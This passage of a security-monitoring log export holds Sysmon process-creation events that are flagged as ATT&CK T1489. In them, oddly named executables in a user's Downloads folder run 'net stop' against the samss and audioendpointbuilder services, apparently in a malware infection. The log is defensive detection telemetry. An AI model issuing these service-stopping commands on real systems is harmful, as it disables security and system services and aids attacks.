Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400}\r\nParentProcessId: 118972\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.559"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-0010836e1400}"",""processId"":""120716"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aca-5ec9-0000-001003651400}"",""parentProcessId"":""118972"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:05.622",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: 
+UtcTime: 2020-05-23 12:44:58.558 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400} +ProcessId: 120708 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.561566900Z"",""eventRecordID"":""1693"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.558\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400}\r\nProcessId: 120708\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: 
C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.558"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-0010716e1400}"",""processId"":""120708"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:05.609",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.313 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400} +ProcessId: 118972 +Image: 
C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.317749500Z"",""eventRecordID"":""1692"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.313\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400}\r\nProcessId: 118972\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.313"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-001003651400}"",""processId"":""118972"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:57.189",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:49.086 +ProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00109d0d1300} +ProcessId: 82368 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300} +ParentProcessId: 82108 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:49.115478300Z"",""eventRecordID"":""1688"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:49.086\r\nProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00109d0d1300}\r\nProcessId: 82368\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300}\r\nParentProcessId: 82108\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:49.086"",""processGuid"":""{df9fc3d3-1ac1-5ec9-0000-00109d0d1300}"",""processId"":""82368"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ac1-5ec9-0000-00103e0a1300}"",""parentProcessId"":""82108"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:57.173",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:49.004 +ProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300} +ProcessId: 82108 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y 
+CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:49.009928000Z"",""eventRecordID"":""1687"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:49.004\r\nProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300}\r\nProcessId: 82108\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: 
{df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:49.004"",""processGuid"":""{df9fc3d3-1ac1-5ec9-0000-00103e0a1300}"",""processId"":""82108"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:57.110",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:48.895 +ProcessGuid: {df9fc3d3-1ac0-5ec9-0000-001085041300} +ProcessId: 81504 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200} +ParentProcessId: 80876 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:48.906837900Z"",""eventRecordID"":""1686"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:48.895\r\nProcessGuid: {df9fc3d3-1ac0-5ec9-0000-001085041300}\r\nProcessId: 81504\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200}\r\nParentProcessId: 80876\r\nParentImage: 
C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:48.895"",""processGuid"":""{df9fc3d3-1ac0-5ec9-0000-001085041300}"",""processId"":""81504"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ac0-5ec9-0000-00104fff1200}"",""parentProcessId"":""80876"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:57.006",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:48.745 +ProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200} +ProcessId: 80876 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:48.755785000Z"",""eventRecordID"":""1685"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:48.745\r\nProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200}\r\nProcessId: 80876\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:48.745"",""processGuid"":""{df9fc3d3-1ac0-5ec9-0000-00104fff1200}"",""processId"":""80876"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:48.980",9,"Windows Application error event","""Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd5c +Faulting application start time: 0x01d630ffc6388e7b +Faulting application path: C:\Windows\system32\backgroundTaskHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 